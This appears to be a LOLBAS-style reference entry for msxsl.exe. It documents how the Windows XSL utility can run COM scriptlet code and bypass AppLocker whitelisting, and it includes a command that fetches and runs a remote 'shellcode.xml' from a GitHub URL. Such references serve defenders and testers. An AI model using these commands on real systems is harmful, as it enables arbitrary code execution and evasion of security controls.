msxsl.exe

Command line utility used to perform XSL transformations.


Paths:


Resources:
https://twitter.com/subTee/status/877616321747271680
https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker

Acknowledgement:
Casey Smith - @subtee


Detection:



Execute

Run COM Scriptlet code within the script.xsl file (local).
msxsl.exe customers.xml script.xsl
Usecase: Local execution of script stored in XSL file.
Privileges required: User
OS: Windows
Mitre: T1218



Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Usecase: Local execution of a remote XSL script stored as an XML file.
Privileges required: User
OS: Windows
Mitre: T1218



AWL bypass

Run COM Scriptlet code within the script.xsl file (local).
msxsl.exe customers.xml script.xsl
Usecase: Local execution of script stored in XSL file.
Privileges required: User
OS: Windows
Mitre: T1218



Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Usecase: Local execution of a remote XSL script stored as an XML file.
Privileges required: User
OS: Windows
Mitre: T1218